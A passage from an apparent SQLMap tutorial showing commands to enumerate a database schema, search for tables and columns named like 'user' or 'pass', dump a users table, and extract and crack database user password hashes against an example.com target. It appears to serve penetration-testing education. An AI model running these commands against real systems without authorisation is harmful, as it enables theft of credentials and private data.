DB Schema Enumeration
sqlmap -u "http://www.example.com/?id=1" --schemaSearching for Data
When dealing with complex database structures with numerous tables and columns, we can search for databases, tables, and columns of interest, by using the --search option. This option enables us to search for identifier names by using the LIKE operator. For example, if we are looking for all of the table names containing the keyword user, we can run SQLMap as follows:
sqlmap -u "http://www.example.com/?id=1" --search -T userWe could also have tried to search for all column names based on a specific keyword (e.g. pass):
sqlmap -u "http://www.example.com/?id=1" --search -C passPassword Enumeration and Cracking
sqlmap -u "http://www.example.com/?id=1" --dump -D master -T usersDB Users Password Enumeration and Cracking
SQLMap has a special switch --passwords designed especially for such a task:
sqlmap -u "http://www.example.com/?id=1" --passwords --batchThe ‘—all’ switch in combination with the ‘—batch’ switch, will automa(g)ically do the whole enumeration process on the target itself, and provide the entire enumeration details.